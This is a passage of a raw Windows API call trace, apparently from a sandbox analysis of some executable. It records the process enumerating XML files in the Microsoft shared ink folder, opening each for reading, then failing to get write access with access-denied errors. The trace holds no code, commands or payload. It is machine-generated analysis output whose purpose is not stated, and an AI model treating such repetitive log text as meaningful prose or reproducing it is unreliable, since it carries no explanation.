(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.788] AreFileApisANSI () returned 1 [0084.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e608 [0084.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 62 [0084.789] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.789] GetFileType (hFile=0x364) returned 0x1 [0084.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.789] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.789] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.789] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.789] CloseHandle (hObject=0x364) returned 1 [0084.790] AreFileApisANSI () returned 1 [0084.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0084.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 62 [0084.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.790] GetLastError () returned 0x5 [0084.790] GetLastError () returned 0x5 [0084.790] SetLastError (dwErrCode=0x5) [0084.790] GetLastError () returned 0x5 [0084.790] SetLastError (dwErrCode=0x5) [0084.790] GetLastError () returned 0x5 [0084.790] SetLastError (dwErrCode=0x5) [0084.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0084.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.790] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0084.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0084.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.791] AreFileApisANSI () returned 1 [0084.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml", lpUsedDefaultChar=0x0) returned 62 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0084.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.791] AreFileApisANSI () returned 1 [0084.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e4f8 [0084.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 62 [0084.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.792] GetFileType (hFile=0x364) returned 0x1 [0084.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0084.792] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.792] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.792] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.792] CloseHandle (hObject=0x364) returned 1 [0084.793] AreFileApisANSI () returned 1 [0084.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e4f8 [0084.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 62 [0084.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.793] GetLastError () returned 0x5 [0084.793] GetLastError () returned 0x5 [0084.793] SetLastError (dwErrCode=0x5) [0084.793] GetLastError () returned 0x5 [0084.793] SetLastError (dwErrCode=0x5) [0084.793] GetLastError () returned 0x5 [0084.793] SetLastError (dwErrCode=0x5) [0084.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0084.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.793] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c96711d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c96711d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0084.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0084.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0084.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.794] AreFileApisANSI () returned 1 [0084.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml", lpUsedDefaultChar=0x0) returned 62 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.794] AreFileApisANSI () returned 1 [0084.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0084.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 62 [0084.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.795] GetFileType (hFile=0x364) returned 0x1 [0084.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0084.796] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.796] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.796] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.796] CloseHandle (hObject=0x364) returned 1 [0084.796] AreFileApisANSI () returned 1 [0084.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e608 [0084.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 62 [0084.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.797] GetLastError () returned 0x5 [0084.797] GetLastError () returned 0x5 [0084.797] SetLastError (dwErrCode=0x5) [0084.797] GetLastError () returned 0x5 [0084.797] SetLastError (dwErrCode=0x5) [0084.797] GetLastError () returned 0x5 [0084.797] SetLastError (dwErrCode=0x5) [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.797] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0084.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0084.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0084.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0084.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.798] AreFileApisANSI () returned 1 [0084.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml", lpUsedDefaultChar=0x0) returned 62 [0084.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0084.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0084.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.798] AreFileApisANSI () returned 1 [0084.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0084.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 